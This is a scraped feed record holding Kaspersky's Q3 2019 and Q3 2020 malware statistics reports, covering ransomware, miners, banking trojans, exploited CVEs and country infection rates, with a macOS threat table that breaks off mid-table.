NAS-connected media. This is a particularly dangerous attack, since in many cases the NAS is used to store backups, and such devices are generally perceived by their owners as a reliable means of storage, and the mere possibility of an infection can come as a shock.\n\n[Wipers](<https://encyclopedia.kaspersky.com/glossary/wiper/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) have also become a [more frequent attack tool](<https://www.bleepingcomputer.com/news/security/destructive-ordinypt-malware-hitting-germany-in-new-spam-campaign/>). Like ransomware, such programs rename files and make ransom demands. But these Trojans irreversibly ruin the file contents (replacing them with zeros or random bytes), so even if the victim pays up, the original files are lost.\n\nThe FBI published decryption keys for GandCrab (verdict Trojan-Ransom.Win32.GandCrypt) versions 4 and 5. The decryption was added to the latest [RakhniDecryptor](<https://support.kaspersky.com/10556>) build.\n\n### Number of new modifications\n\nIn Q3 2019, we identified three new families of ransomware Trojans and discovered 13,138 new modifications of this malware.\n\n_Number of new ransomware modifications, Q3 2018 \u2013 Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171414/malware-q3-2019-statistics-en-14.png>)\n\n### Number of users attacked by ransomware Trojans\n\nIn Q3 2019, Kaspersky products defeated ransomware attacks against 229,643 unique KSN users. This is slightly fewer than the previous quarter.\n\n_Number of unique users attacked by ransomware Trojans, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171421/malware-q3-2019-statistics-en-15.png>)\n\nJuly saw the largest number of attacked users \u2014 100,380, almost 20,000 more than in June. After that, however, this indicator fell sharply and did not stray far from the figure of 90,000 attacked users.\n\n### Attack geography\n\n_Geographical spread of countries by share of users attacked by ransomware Trojans, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171430/malware-q3-2019-statistics-en-16.png>)\n\n**TOP 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Bangladesh | 6.39 \n2 | Mozambique | 2.96 \n3 | Uzbekistan | 2.26 \n4 | Nepal | 1.71 \n5 | Ethiopia | 1.29 \n6 | Ghana | 1.19 \n7 | Afghanistan | 1.12 \n8 | Egypt | 0.83 \n9 | Palestine | 0.80 \n10 | Vietnam | 0.79 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **% of attacked users*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 20.96 | \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 20.01 | \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 8.58 | \n4 | (generic verdict) | Trojan-Ransom.Win32.Gen | 8.36 | \n5 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 6.56 | \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 5.08 | \n7 | Stop | Trojan-Ransom.Win32.Stop | 4.63 | \n8 | Rakhni | Trojan-Ransom.Win32.Rakhni | 3.97 | \n9 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 2.77 | \n10 | PolyRansom/VirLock | Virus.Win32.PolyRansom \nTrojan-Ransom.Win32. PolyRansom | 2.50 | \n| | | | | \n \n_* Unique Kaspersky users attacked by the specified family of ransomware Trojans as a percentage of all users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new modifications\n\nIn Q3 2019, Kaspersky solutions detected 11 753 new modifications of miners.\n\n_Number of new miner modifications, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171437/malware-q3-2019-statistics-en-17.png>)\n\n### Number of users attacked by miners\n\nIn Q3, we detected attacks using miners on the computers of 639,496 unique users of Kaspersky products worldwide.\n\n_Number of unique users attacked by miners, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171445/malware-q3-2019-statistics-en-18.png>)\n\nThe number of attacked users continued to decline in Q3, down to 282,334 in August. In September, this indicator began to grow \u2014 up to 297,394 \u2014 within touching distance of July's figure.\n\n### Attack geography\n\n_Geographical spread of countries by share of users attacked by miners, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171455/malware-q3-2019-statistics-en-19.png>)\n\n**TOP 10 countries by share of users attacked by miners**\n\n| **Country*** | **% of users attacked by miners**** \n---|---|--- \n1 | Afghanistan | 9.42 \n2 | Ethiopia | 7.29 \n3 | Uzbekistan | 4.99 \n4 | Sri Lanka | 4.62 \n5 | Tanzania | 4.35 \n6 | Vietnam | 3.72 \n7 | Kazakhstan | 3.66 \n8 | Mozambique | 3.44 \n9 | Rwanda | 2.55 \n10 | Bolivia | 2.43 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyber attacks\n\nAs before, in the statistics on the distribution of exploits used by cybercriminals, a huge share belongs to vulnerabilities in the Microsoft Office suite (73%). Most common of all, as in the previous quarter, were stack overflow errors ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>)) in the Equation Editor application, which was previously part of Microsoft Office. Other Microsoft Office vulnerabilities widely exploited this quarter were again [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>), and [CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>).\n\nModern browsers are complex software products, which means that new vulnerabilities are constantly being discovered and used in attacks (13%). The most common target for cybercriminals is Microsoft Internet Explorer, vulnerabilities in which are often exploited in the wild. This quarter saw the discovery of the actively exploited zero-day vulnerability [CVE-2019-1367](<https://www.helpnetsecurity.com/2019/09/24/cve-2019-1367/>), which causes memory corruption and allows remote code execution on the target system. The fact that Microsoft released an unscheduled patch for it points to how serious the situation was. Nor was Google Chrome problem-free this quarter, having received updates to fix a number of [critical vulnerabilities](<https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-google-chrome-could-allow-for-arbitrary-code-execution_2019-095/>) (CVE-2019-13685, CVE-2019-13686, CVE-2019-13687, CVE-2019-13688), some of which allow intruders to circumvent all levels of browser protection and execute code in the system, bypassing the [sandbox](<https://encyclopedia.kaspersky.com/glossary/sandbox/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>).\n\nThe majority of vulnerabilities aimed at privilege escalation inside the system stem from individual operating system services and popular apps. Privilege escalation vulnerabilities play a special role, as they are often utilized in malicious software to obtain persistence in the target system. Of note this quarter are the vulnerabilities [CVE-2019-14743](<https://www.bleepingcomputer.com/news/security/steam-security-saga-continues-with-vulnerability-fix-bypass/>) and [CVE-2019-15315](<https://nvd.nist.gov/vuln/detail/CVE-2019-15315>), which allow compromising systems with the popular Steam client installed. A flaw in the Microsoft Windows Text Services Framework also warrants a mention. A Google researcher published a tool to demonstrate the problem ([CtfTool](<https://blog.stealthbits.com/using-ctftool-exe-to-escalate-privileges-by-leveraging-text-services-framework-and-mitigation-processes-and-steps/>)), which allows processes to be run with system privileges, as well as changes to be made to the memory of other processes and arbitrary code to be executed in them.\n\n_Distribution of exploits used in attacks by type of application attacked, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171502/malware-q3-2019-statistics-en-20.png>)\n\nNetwork attacks are still widespread. This quarter, as in previous ones, we registered numerous attempts to exploit vulnerabilities in the SMB protocol. This indicates that unprotected and not-updated systems are still at high risk of infection in attacks that deploy EternalBlue, EternalRomance, and other exploits. That said, a large share of malicious network traffic is made up of requests aimed at bruteforcing passwords in popular network services and servers, such as Remote Desktop Protocol and Microsoft SQL Server. RDP faced other problems too related to the detection of several vulnerabilities in this network protocol united under the common name [DejaBlue](<https://www.wired.com/story/dejablue-windows-bugs-worm-rdp/>) ([CVE-2019-1181](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1181>), [CVE-2019-1182](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1182>), [CVE-2019-1222](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1222>), [CVE-2019-1223](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1223>), [CVE-2019-1224](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1224>), [CVE-2019-1225](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1225>), [CVE-2019-1226](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1226>)). Unlike the previously discovered [CVE-2019-0708](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>), these vulnerabilities affect not only old versions of operating systems, but new ones as well, such as Windows 10. As in the case of [CVE-2019-0708](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>), some [DejaBlue](<https://www.wired.com/story/dejablue-windows-bugs-worm-rdp/>) vulnerabilities do not require authorization in the attacked system and allow to carry out malicious activity invisible to the user. Therefore, it is vital to promptly install the latest updates for both the operating system and antivirus solutions to reduce the risk of infection.\n\n### Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q3 2019, Kaspersky solutions blocked **989,432,403** attacks launched from online resources located in 203 countries across the globe. **560,025,316** unique URLs triggered Web Anti-Virus components.\n\n_Distribution of web-based attack sources by country, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171508/malware-q3-2019-statistics-en-21.png>)\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Tunisia | 23.26 \n2 | Algeria | 19.75 \n3 | Albania | 18.77 \n4 | R\u00e9union | 16.46 \n5 | Bangladesh | 16.46 \n6 | Venezuela | 16.21 \n7 | North Macedonia | 15.33 \n8 | France | 15.09 \n9 | Qatar | 14.97 \n10 | Martinique | 14.84 \n11 | Greece | 14.59 \n12 | Serbia | 14.36 \n13 | Syria | 13.99 \n14 | Bulgaria | 13.88 \n15 | Philippines | 13.71 \n16 | UAE | 13.64 \n17 | Djibouti | 13.47 \n18 | Morocco | 13.35 \n19 | Belarus | 13.34 \n20 | Saudi Arabia | 13.30 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average, 10.97% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n_Geography of malicious web-based attacks, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171517/malware-q3-2019-statistics-en-22.png>)\n\n## Local threats\n\n_Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q3 2019, our File Anti-Virus detected **230,051,054** malicious and potentially unwanted objects.\n\n#### **Countries where users faced the highest risk of local infection**\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 53.45 \n2 | Tajikistan | 48.43 \n3 | Yemen | 48.39 \n4 | Uzbekistan | 48.38 \n5 | Turkmenistan | 45.95 \n6 | Myanmar | 45.27 \n7 | Ethiopia | 44.18 \n8 | Laos | 43.24 \n9 | Bangladesh | 42.96 \n10 | Mozambique | 41.58 \n11 | Syria | 41.15 \n12 | Vietnam | 41.11 \n13 | Iraq | 41.09 \n14 | Sudan | 40.18 \n15 | Kyrgyzstan | 40.06 \n16 | China | 39.94 \n17 | Rwanda | 39.49 \n18 | Venezuela | 39.18 \n19 | Malawi | 38.81 \n20 | Nepal | 38.38 \n| | \n \n_These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera memory cards, phones and external hard drives._\n\n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171525/malware-q3-2019-statistics-en-23.png>)\n\nOverall, 21.1% of user computers globally faced at least one **Malware-class** local threat during Q3.\n\nThe figure for Russia was 24.24%.", "cvss3": {}, "published": "2019-11-29T10:00:19", "type": "securelist", "title": "IT threat evolution Q3 2019. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2019-0708", "CVE-2019-1181", "CVE-2019-1182", "CVE-2019-1222", "CVE-2019-1223", "CVE-2019-1224", "CVE-2019-1225", "CVE-2019-1226", "CVE-2019-1367", "CVE-2019-13685", "CVE-2019-13686", "CVE-2019-13687", "CVE-2019-13688", "CVE-2019-14743", "CVE-2019-15315"], "modified": "2019-11-29T10:00:19", "id": "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D", "href": "https://securelist.com/it-threat-evolution-q3-2019-statistics/95269/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-20T10:20:28", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22101624/malware_SL_pic3-990x400.jpg)\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q3:\n\n * Kaspersky solutions blocked 1,416,295,227 attacks launched from online resources across the globe.\n * 456,573,467 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 146,761 unique users.\n * Ransomware attacks were defeated on the computers of 121,579 unique users.\n * Our File Anti-Virus detected 87,941,334 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q3 2020, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 146,761 users.\n\n_Number of unique users attacked by financial malware, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18161937/malware-report-q3-2020_01-en.png>))_\n\n### **Attack geography**\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country.\n\n_Geography of financial malware attacks, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162003/malware-report-q3-2020_02-en.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Costa Rica | 6.6 \n2 | Turkmenistan | 5.9 \n3 | Tajikistan | 4.7 \n4 | Uzbekistan | 4.6 \n5 | Afghanistan | 3.4 \n6 | Syria | 1.7 \n7 | Iran | 1.6 \n8 | Yemen | 1.6 \n9 | Kazakhstan | 1.5 \n10 | Venezuela | 1.5 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000). \n** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\nFirst among the banker families, as in the previous quarter, is Zbot (19.7%), despite its share dropping 5.1 p.p. It is followed by Emotet (16.1%) \u2014 as we predicted, this malware renewed its activity, climbing by 9.5 p.p. as a result. Meanwhile, the share of another banker family, RTM, decreased by 11.2 p.p., falling from second position to fifth with a score of 7.4%.\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 19.7 | \n2 | Emotet | Backdoor.Win32.Emotet | 16.1 | \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 12.2 | \n4 | Trickster | Trojan.Win32.Trickster | 8.8 | \n5 | RTM | Trojan-Banker.Win32.RTM | 7.4 | \n6 | Neurevt | Trojan.Win32.Neurevt | 5.4 | \n7 | Nimnul | Virus.Win32.Nimnul | 4.4 | \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.5 | \n9 | Danabot | Trojan-Banker.Win32.Danabot | 3.1 | \n10 | Gozi | Trojan-Banker.Win32.Gozi | 1.9 | \n \n_** Unique users who encountered this malware family as a __percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\nQ3 2020 saw many high-profile ransomware attacks on organizations in various fields: [education](<https://threatpost.com/university-of-utah-pays-457k-after-ransomware-attack/158564/>), [healthcare](<https://threatpost.com/universal-health-ransomware-hospitals-nationwide/159604/>), [governance](<https://www.bleepingcomputer.com/news/security/netwalker-ransomware-hits-argentinian-government-demands-4-million/>), [energy](<https://www.bleepingcomputer.com/news/security/edp-energy-giant-confirms-ragnar-locker-ransomware-attack/>), [finance](<https://www.bleepingcomputer.com/news/security/development-bank-of-seychelles-hit-by-ransomware-attack/>), [IT](<https://www.bleepingcomputer.com/news/security/equinix-data-center-giant-hit-by-netwalker-ransomware-45m-ransom/>), [telecommunications](<https://www.bleepingcomputer.com/news/security/orange-confirms-ransomware-attack-exposing-business-customers-data/>) and [many](<https://www.kaspersky.com/blog/wastedlocker-garmin-incident/36626/>) [others](<https://www.bleepingcomputer.com/news/security/ray-ban-owner-luxottica-confirms-ransomware-attack-work-disrupted/>). Such cybercriminal activity is understandable: a successful attack on a major organization can command a ransom in the millions of dollars, which is several orders of magnitude higher than the typical sum for mass ransomware.\n\nCampaigns of this type can be viewed as advanced persistent threats (APTs), and Kaspersky researchers [detected the involvement](<https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/>) of the Lazarus group in the distribution of one of these ransomware programs.\n\nDistributors of these Trojans also began to cooperate with the aim of carrying out more effective and destructive attacks. At the start of the quarter, word leaked out that Maze operators had joined forces with distributors of LockBit, and later RagnarLocker, to form a ransomware cartel. The cybercriminals used shared infrastructure to publish stolen confidential data. Also observed was the [pooling of expertise](<https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/>) in countering security solutions.\n\nOf the more heartening events, Q3 will be remembered for the arrest of one of the operators of the GandCrab ransomware. Law enforcement agencies in Belarus, Romania and the UK [teamed up to catch](<https://www.zdnet.com/article/gandcrab-ransomware-distributor-arrested-in-belarus/>) the distributor of the malware, which had reportedly infected more than 1,000 computers.\n\n### Number of new modifications\n\nIn Q3 2020, we detected four new ransomware families and 6,720 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q3 2019 \u2013 Q3 2020 ([download](<https://khub-media.s3.eu-west-1.amazonaws.com/wp-content/uploads/sites/58/2020/11/18185739/malware-report-q3-2020_03.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q3 2020, Kaspersky products and technologies protected 121,579 users against ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162058/malware-report-q3-2020_04-en.png>))_\n\n### Attack geography\n\n_Geography of attacks by ransomware Trojans, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162124/malware-report-q3-2020_05-en.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 2.37 \n2 | Mozambique | 1.10 \n3 | Ethiopia | 1.02 \n4 | Afghanistan | 0.87 \n5 | Uzbekistan | 0.79 \n6 | Egypt | 0.71 \n7 | China | 0.65 \n8 | Pakistan | 0.52 \n9 | Vietnam | 0.50 \n10 | Myanmar | 0.46 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). \n** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n**Top 10 most common families of ransomware Trojans**\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 18.77 | \n2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 10.37 | \n3 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 9.58 | \n4 | (generic verdict) | Trojan-Ransom.Win32.Generic | 8.55 | \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.37 | \n6 | Stop | Trojan-Ransom.Win32.Stop | 5.89 | \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.12 | \n8 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 3.14 | \n9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 2.44 | \n10 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 1.69 | \n \n_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._\n\n## Miners\n\n### Number of new modifications\n\nIn Q3 2020, Kaspersky solutions detected 3,722 new modifications of miners.\n\n_Number of new miner modifications, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162152/malware-report-q3-2020_06-en.png>))_\n\n### Number of users attacked by miners\n\nIn Q3, we detected attacks using miners on the computers of 440,041 unique users of Kaspersky products worldwide. If in the previous quarter the number of attacked users decreased, in this reporting period the situation was reversed: from July we saw a gradual rise in activity.\n\n_Number of unique users attacked by miners, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162222/malware-report-q3-2020_07-en.png>))_\n\n### Attack geography\n\n_Geography of miner attacks, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162251/malware-report-q3-2020_08-en.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 5.53 \n2 | Ethiopia | 3.94 \n3 | Tanzania | 3.06 \n4 | Rwanda | 2.58 \n5 | Uzbekistan | 2.46 \n6 | Sri Lanka | 2.30 \n7 | Kazakhstan | 2.26 \n8 | Vietnam | 1.95 \n9 | Mozambique | 1.76 \n10 | Pakistan | 1.57 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000). \n** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\nAccording to our statistics, vulnerabilities in the Microsoft Office suite continue to lead: in Q3, their share amounted to 71% of all identified vulnerabilities. Users worldwide are in no rush to update the package, putting their computers at risk of infection. Although our products protect against the exploitation of vulnerabilities, we strongly recommend the timely installation of patches, especially security updates.\n\nFirst place in this category of vulnerabilities goes to [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), which can embed a malicious script in an OLE object placed inside an Office document. Almost on a par in terms of popularity is the vulnerability [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), exploits for which use a stack overflow error in the Equation Editor component. [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) likewise remain popular.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162317/malware-report-q3-2020_09-en.png>))_\n\nThe share of vulnerabilities in Internet browsers increased by 3 p.p. this quarter to 15%. One of the most-talked-about browser vulnerabilities was [CVE-2020-1380](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1380>) \u2014 a use-after-free error in the jscript9.dll library of the current version of the Internet Explorer 9+ scripting engine. This same vulnerability was spotted in [the Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>) targeted attack.\n\nAlso in Q3, researchers discovered the critical vulnerability [CVE-2020-6492](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-6492>) in the WebGL component of Google Chrome. Theoretically, it can be used to execute arbitrary code in the context of a program. The similar vulnerability [CVE-2020-6542](<https://nvd.nist.gov/vuln/detail/CVE-2020-6542>) was later found in the same component. Use-after-free vulnerabilities were detected in other components too: Task Scheduler ([CVE-2020-6543](<https://nvd.nist.gov/vuln/detail/CVE-2020-6543>)), Media ([CVE-2020-6544](<https://nvd.nist.gov/vuln/detail/CVE-2020-6544>)) and Audio ([CVE-2020-6545](<https://nvd.nist.gov/vuln/detail/CVE-2020-6545>)).\n\nIn another browser, Mozilla Firefox, three critical vulnerabilities, [CVE-2020-15675](<https://nvd.nist.gov/vuln/detail/CVE-2020-15675>), [CVE-2020-15674](<https://nvd.nist.gov/vuln/detail/CVE-2020-15674>) and [CVE-2020-15673](<https://nvd.nist.gov/vuln/detail/CVE-2020-15673>), related to incorrect memory handling, were detected, also potentially leading to arbitrary code execution in the system.\n\nIn the reporting quarter, the vulnerability [CVE-2020-1464](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1464>), used to bypass scans on malicious files delivered to user systems, was discovered in Microsoft Windows. An error in the cryptographic code made it possible for an attacker to insert a malicious JAR archive inside a correctly signed MSI file, circumvent security mechanisms, and compromise the system. Also detected were vulnerabilities that could potentially be used to compromise a system with different levels of privileges:\n\n * [CVE-2020-1554](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1554>), [CVE-2020-1492](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1492>), [CVE-2020-1379](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1379>), [CVE-2020-1477](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1477>) and [CVE-2020-1525](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1525>) in the Windows Media Foundation component;\n * [CVE-2020-1046](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1046>), detected in the .NET platform, can be used to run malicious code with administrator privileges;\n * [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>), a vulnerability in the code for processing Netlogon Remote Protocol requests that could allow an attacker to change any user credentials.\n\nAmong network-based attacks, those involving EternalBlue exploits and other vulnerabilities from the Shadow Brokers suite remain popular. Also common are brute-force attacks on Remote Desktop Services and Microsoft SQL Server, and via the SMB protocol. In addition, the already mentioned critical vulnerability [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>), also known as Zerologon, is network-based. This error allows an intruder in the corporate network to impersonate any computer and change its password in Active Directory.\n\n## Attacks on macOS\n\nPerhaps this quarter's most interesting find was [EvilQuest](<https://objective-see.com/blog/blog_0x59.html>), also known as Virus.OSX.ThifQseut.a. It is a self-replicating piece of ransomware, that is, a full-fledged virus. The last such malware for macOS was detected 13 years ago, since which time this class of threats has been considered irrelevant for this platform.\n\n**Top 20 threats for macOS**\n\n| Verdict | %* \n---|---|--- \n1 | Monitor.OSX.HistGrabber.b | 14.11 \n2 | AdWare.OSX.Pirrit.j | 9.21 \n3 | AdWare.OSX.Bnodlero.at | 9.06 \n4 | Trojan-Downloader.OSX.Shlayer.a | 8.98 \n5 | AdWare.OSX.Bnodlero.ay | 6.78 \n6 | AdWare.OSX.Pirrit.ac | 5.78 \n7 | AdWare.OSX.Ketin.h | 5.71 \n8 | AdWare.OSX.Pirrit.o | 5.47 \n9 | AdWare.OSX.Cimpli.k | 4.79 \n10 | AdWare.OSX.Ketin.m | 4.45 \n11 | Hoax.OSX.Amc.d | 4.38 \n12 | Trojan-Downloader.OSX.Agent.j | 3.98 \n13 | Trojan-Downloader.OSX.Agent.h | 3.58 \n14 | AdWare.OSX.Pirrit.gen | 3.52 \n15 | AdWare.OSX.Spc.a | 3.18 \n16 | AdWare.OSX.Amc.c | 2.97 \n17 | AdWare.OSX.Pirrit.aa | 2.94 \n18 | AdWare.OSX.Pirrit.x | 2.81 \n19 | AdWare.OSX.Cimpli.l | 2.78 \n20 | AdWare.OSX.Bnodlero.x | 2.64 \n \n_* Unique users who encountered this 